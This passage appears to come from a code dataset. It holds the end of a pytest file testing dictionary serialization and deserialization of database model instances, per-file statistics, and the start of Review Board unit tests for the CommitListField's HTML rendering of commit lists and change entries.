(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 1, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' }, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, True, False, None, None),
# Error on Extra Keys
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
# Include Extra Keys in result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'extra': 'test', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, False, None, None),
# Exclude Extra Keys from result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, True, None, None),
])
def test_instance__parse_dict(request,
instance_single_pk,
instance_postgresql,
supports_serialization,
hybrid_value,
format,
max_nesting,
current_nesting,
extra_keys,
error_on_extra_keys,
drop_extra_keys,
expected_result,
warning,
error):
if supports_serialization:
target = instance_postgresql[0][0]
else:
target = instance_single_pk[0]
target.hybrid = hybrid_value
if not error and not warning:
input_data = target._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
result = target._parse_dict(input_data,
format,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
if not error_on_extra_keys and drop_extra_keys:
for key in extra_keys:
assert key not in result
elif not error_on_extra_keys and not drop_extra_keys:
for key in extra_keys:
assert key in result
assert are_dicts_equivalent(result, expected_result) is True
elif not warning:
with pytest.raises(error):
input_data = target._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
result = target._parse_dict(input_data,
format,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
elif not error:
with pytest.warns(warning):
input_data = target._to_dict(format,
max_nesting = max_nesting,
current_nesting = current_nesting)
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
result = target._parse_dict(input_data,
format,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
assert isinstance(result, dict)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
if not error_on_extra_keys and drop_extra_keys:
for key in extra_keys:
assert key not in result
elif not error_on_extra_keys and not drop_extra_keys:
for key in extra_keys:
assert key in result
assert are_dicts_equivalent(result, expected_result) is True
@pytest.mark.parametrize('supports_serialization, hybrid_value, max_nesting, current_nesting, expected_result, warning, error', [
(False, None, 0, 0, None, None, SerializableAttributeError),
(False, None, 0, 3, None, None, MaximumNestingExceededError),
(True, 'test value', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 1, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, None),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, None),
])
def test_to_dict(request,
instance_single_pk,
instance_postgresql,
supports_serialization,
hybrid_value,
max_nesting,
current_nesting,
expected_result,
warning,
error):
if supports_serialization:
target = instance_postgresql[0][0]
else:
target = instance_single_pk[0]
target.hybrid = hybrid_value
if not error and not warning:
result = target.to_dict(max_nesting = max_nesting,
current_nesting = current_nesting)
assert isinstance(result, dict)
print('RESULT:')
print(result)
print('\nEXPECTED:')
print(expected_result)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
assert are_dicts_equivalent(result, expected_result) is True
elif not warning:
with pytest.raises(error):
result = target.to_dict(max_nesting = max_nesting,
current_nesting = current_nesting)
elif not error:
with pytest.warns(warning):
result = target.to_dict(max_nesting = max_nesting,
current_nesting = current_nesting)
assert isinstance(result, dict)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
assert are_dicts_equivalent(result, expected_result) is True
@pytest.mark.parametrize('supports_serialization, hybrid_value, max_nesting, current_nesting, expected_result, warning, error', [
(False, None, 0, 0, { 'id': 1, '_hybrid': 1, 'hybrid_differentiated': 1, 'name': 'Test Name', 'hybrid': None }, MaximumNestingExceededWarning, None),
(False, None, 0, 3, None, None, MaximumNestingExceededError),
(True, 'test value', 0, 0, {'_hybrid': 1, 'hidden': 'hidden value', 'hybrid': 'test value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1)}, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 0, 0, { '_hybrid': 1, 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, MaximumNestingExceededWarning, None),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 1, 0, { '_hybrid': 1, 'addresses': [], 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, None, None),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 0, 0, { '_hybrid': 1, 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, MaximumNestingExceededWarning, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 0, 0, { '_hybrid': 1, 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, MaximumNestingExceededWarning, None),
])
def test_dump_to_dict(request,
instance_single_pk,
instance_postgresql,
supports_serialization,
hybrid_value,
max_nesting,
current_nesting,
expected_result,
warning,
error):
if supports_serialization:
target = instance_postgresql[0][0]
else:
target = instance_single_pk[0]
target.hybrid = hybrid_value
if not error and not warning:
result = target.dump_to_dict(max_nesting = max_nesting,
current_nesting = current_nesting)
assert isinstance(result, dict)
print('RESULT:')
print(result)
print('\nEXPECTED:')
print(expected_result)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
assert are_dicts_equivalent(result, expected_result) is True
elif not warning:
with pytest.raises(error):
result = target.dump_to_dict(max_nesting = max_nesting,
current_nesting = current_nesting)
elif not error:
with pytest.warns(warning):
result = target.dump_to_dict(max_nesting = max_nesting,
current_nesting = current_nesting)
assert isinstance(result, dict)
for key in result:
assert key in expected_result
assert expected_result[key] == result[key]
for key in expected_result:
assert key in result
assert result[key] == expected_result[key]
assert are_dicts_equivalent(result, expected_result) is True
@pytest.mark.parametrize('hybrid_value, expected_name, extra_keys, error_on_extra_keys, drop_extra_keys, error', [
('test value', 'deserialized', None, True, False, None),
(123, 'deserialized', None, True, False, None),
('test value', 'deserialized', { 'extra': 'test'}, True, False, ExtraKeyError),
('test value', 'deserialized', { 'extra': 'test'}, False, False, None),
('test value', 'deserialized', { 'extra': 'test'}, False, True, None),
])
def test_update_from_dict(request,
model_complex_postgresql,
instance_postgresql,
hybrid_value,
expected_name,
extra_keys,
error_on_extra_keys,
drop_extra_keys,
error):
model = model_complex_postgresql[0]
target = instance_postgresql[0][0]
input_data = target.to_dict(max_nesting = 5,
current_nesting = 0)
input_data['hybrid_value'] = hybrid_value
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
if not error:
target.update_from_dict(input_data,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
assert isinstance(target, model)
assert getattr(target, 'name') == expected_name
assert getattr(target, 'hybrid') == hybrid_value
assert getattr(target, 'id') == target.id
if extra_keys and not error_on_extra_keys and not drop_extra_keys:
for key in extra_keys:
assert hasattr(target, key) is True
assert getattr(target, key) == extra_keys[key]
else:
with pytest.raises(error):
target.update_from_dict(input_data,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
@pytest.mark.parametrize('hybrid_value, expected_name, extra_keys, error_on_extra_keys, drop_extra_keys, error', [
('test value', 'deserialized', None, True, False, None),
(123, 'deserialized', None, True, False, None),
('test value', 'deserialized', { 'extra': 'test'}, True, False, ExtraKeyError),
('test value', 'deserialized', { 'extra': 'test'}, False, False, TypeError),
('test value', 'deserialized', { 'extra': 'test'}, False, True, None),
])
def test_new_from_dict(request,
model_complex_postgresql,
instance_postgresql,
hybrid_value,
expected_name,
extra_keys,
error_on_extra_keys,
drop_extra_keys,
error):
target = model_complex_postgresql[0]
source = instance_postgresql[0][0]
input_data = source.to_dict(max_nesting = 5,
current_nesting = 0)
input_data['hybrid_value'] = hybrid_value
if extra_keys:
for key in extra_keys:
input_data[key] = extra_keys[key]
if not error:
result = target.new_from_dict(input_data,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
assert isinstance(result, target)
assert getattr(result, 'name') == expected_name
assert getattr(result, 'hybrid') == hybrid_value
assert getattr(result, 'id') == source.id
if extra_keys and not error_on_extra_keys and not drop_extra_keys:
for key in extra_keys:
assert hasattr(result, key) is True
assert getattr(result, key) == extra_keys[key]
else:
with pytest.raises(error):
result = target.new_from_dict(input_data,
error_on_extra_keys = error_on_extra_keys,
drop_extra_keys = drop_extra_keys)
| 59.602917
| 331
| 0.580829
| 4,055
| 36,775
| 5.066338
| 0.033292
| 0.056075
| 0.025896
| 0.027648
| 0.952833
| 0.943585
| 0.937938
| 0.920561
| 0.917299
| 0.908879
| 0
| 0.019001
| 0.268688
| 36,775
| 616
| 332
| 59.699675
| 0.744887
| 0.011366
| 0
| 0.851406
| 0
| 0.004016
| 0.212928
| 0.006632
| 0
| 0
| 0
| 0
| 0.140562
| 1
| 0.014056
| false
| 0.01004
| 0.012048
| 0
| 0.026104
| 0.024096
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e56662f70c7bc54ce14bec5fcb752da7121156f
| 35,401
|
py
|
Python
|
reviewboard/reviews/tests/test_builtin_fields.py
|
amalik2/reviewboard
|
676aa2dce38ce619a74f2d4cb3cfae9bce21416e
|
[
"MIT"
] | 2
|
2020-06-19T14:57:49.000Z
|
2020-06-19T15:17:40.000Z
|
reviewboard/reviews/tests/test_builtin_fields.py
|
amalik2/reviewboard
|
676aa2dce38ce619a74f2d4cb3cfae9bce21416e
|
[
"MIT"
] | 1
|
2019-08-03T01:48:33.000Z
|
2019-08-03T01:48:33.000Z
|
reviewboard/reviews/tests/test_builtin_fields.py
|
amalik2/reviewboard
|
676aa2dce38ce619a74f2d4cb3cfae9bce21416e
|
[
"MIT"
] | null | null | null |
"""Unit tests for reviewboard.reviews.builtin_fields."""
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser, User
from django.core.urlresolvers import resolve
from django.test.client import RequestFactory
from reviewboard.reviews.builtin_fields import CommitListField
from reviewboard.reviews.detail import ReviewRequestPageData
from reviewboard.reviews.models import ReviewRequestDraft
from reviewboard.testing.testcase import TestCase
class CommitListFieldTests(TestCase):
"""Unit tests for CommitListField."""
fixtures = ['test_scmtools', 'test_users']
def setUp(self):
super(CommitListFieldTests, self).setUp()
self.request_factory = RequestFactory()
def test_should_render_history_review_request(self):
"""Testing CommitListField.should_render with a review request created
with history
"""
review_request = self.create_review_request(create_with_history=True)
request = self._build_review_request_get(review_request)
field = CommitListField(review_request, request=request)
self.assertTrue(field.should_render)
def test_should_render_history_draft(self):
"""Testing CommitListField.should_render with a draft of a review
request created with history
"""
review_request = self.create_review_request(create_with_history=True)
draft = ReviewRequestDraft.create(review_request)
request = self._build_review_request_get(review_request)
field = CommitListField(draft, request=request)
self.assertTrue(field.should_render)
def test_should_render_no_history_review_request(self):
"""Testing CommitListField.should_render with a review request created
without history
"""
review_request = self.create_review_request()
request = self._build_review_request_get(review_request)
field = CommitListField(review_request, request=request)
self.assertFalse(field.should_render)
def test_should_render_no_history_draft(self):
"""Testing CommitListField.should_render with a draft of a review
request created without history
"""
review_request = self.create_review_request()
draft = ReviewRequestDraft.create(review_request)
request = self._build_review_request_get(review_request)
field = CommitListField(draft, request=request)
self.assertFalse(field.should_render)
def test_can_record_change_entry_history_review_request(self):
"""Testing CommitListField.can_record_change_entry with a review
request created with history
"""
review_request = self.create_review_request(create_with_history=True)
field = CommitListField(review_request)
self.assertTrue(field.can_record_change_entry)
def test_can_record_change_entry_history_draft(self):
"""Testing CommitListField.can_record_change_entry with a draft of a
review request created with history
"""
review_request = self.create_review_request(create_with_history=True)
draft = ReviewRequestDraft.create(review_request)
field = CommitListField(draft)
self.assertTrue(field.can_record_change_entry)
def test_can_record_change_entry_no_history_review_request(self):
"""Testing CommitListField.can_record_change_entry with a review
request created without history
"""
review_request = self.create_review_request()
field = CommitListField(review_request)
self.assertFalse(field.can_record_change_entry)
def test_can_record_change_entry_no_history_draft(self):
"""Testing CommitListField.can_record_change_entry with a draft of a
review request created without history
"""
review_request = self.create_review_request()
draft = ReviewRequestDraft.create(review_request)
field = CommitListField(draft)
self.assertFalse(field.can_record_change_entry)
def test_render_value(self):
"""Testing CommitListField.render_value"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=author_name),
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=author_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML('<colgroup><col></colgroup>', result)
self.assertInHTML('<tr><th>Summary</th></tr>', result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_value_with_author(self):
"""Testing CommitListField.render_value with an author that differs
from the review request submitter
"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML('<colgroup><col><col></colgroup>', result)
self.assertInHTML(
'<tr><th>Summary</th><th>Author</th></tr>',
result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' <td>Example Author</td>'
' </tr>'
' <tr>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' <td>%s</td>'
' </tr>'
'</tbody>'
% submitter_name,
result)
def test_render_value_with_collapse(self):
"""Testing CommitListField.render_value with a multi-line commit
message
"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2\n'
'Longer message\n',
author_name=author_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML(
'<colgroup>'
' <col class="expand-collapse-control">'
' <col>'
'</colgroup>',
result)
self.assertInHTML('<tr><th colspan="2">Summary</th></tr>', result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td></td>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="2" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_value_with_collapse_and_author(self):
"""Testing CommitListField.render_value with an author that differs
from the review request submitter and a multi-line commit message
"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2\n'
'Longer message\n',
author_name=submitter_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML(
'<colgroup>'
' <col class="expand-collapse-control">'
' <col>'
' <col>'
'</colgroup>',
result)
self.assertInHTML(
'<tr>'
' <th colspan="2">Summary</th>'
' <th>Author</th>'
'</tr>',
result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td></td>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' <td>Example Author</td>'
' </tr>'
' <tr>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="2" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' <td>%s</td>'
' </tr>'
'</tbody>'
% submitter_name,
result)
def test_render_change_entry_html(self):
"""Testing CommitListField.render_change_entry_html"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=author_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name=author_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML('<colgroup><col><col></colgroup>', result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th>Summary</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 2</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 1</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_change_entry_html_expand(self):
"""Testing CommitListField.render_change_entry_html with a multi-line
commit message
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1\n\n'
'A long message.\n',
author_name=author_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=author_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2\n\n'
'So very long of a message.\n',
author_name=author_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML(
'<colgroup>'
' <col>'
' <col class="expand-collapse-control">'
' <col>'
'</colgroup>',
result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th colspan="2">Summary</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="1" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td />'
' <td class="value"><pre>Commit message 2</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td />'
' <td class="value"><pre>New commit message 1</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="4" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_change_entry_html_expand_with_author(self):
"""Testing CommitListField.render_change_entry_html with an author that
differs from the review request submitter and a multi-line commit
message
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1\n\n'
'A long message.\n',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2\n\n'
'So very long of a message.\n',
author_name=submitter_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML(
'<colgroup>'
' <col>'
' <col class="expand-collapse-control">'
' <col>'
' <col>'
'</colgroup>',
result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th colspan="2">Summary</th>'
' <th>Author</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="1" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' <td class="value">Example Author</td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td />'
' <td class="value"><pre>Commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td />'
' <td class="value"><pre>New commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="4" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
'</tbody>'
% {'name': submitter_name},
result)
def test_render_change_entry_html_with_author_old(self):
"""Testing CommitListField.render_change_entry_html with an author that
differs from the review request submitter in the old commits
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name=submitter_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML('<colgroup><col><col><col></colgroup>', result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th>Summary</th>'
' <th>Author</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' <td class="value">Example Author</td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
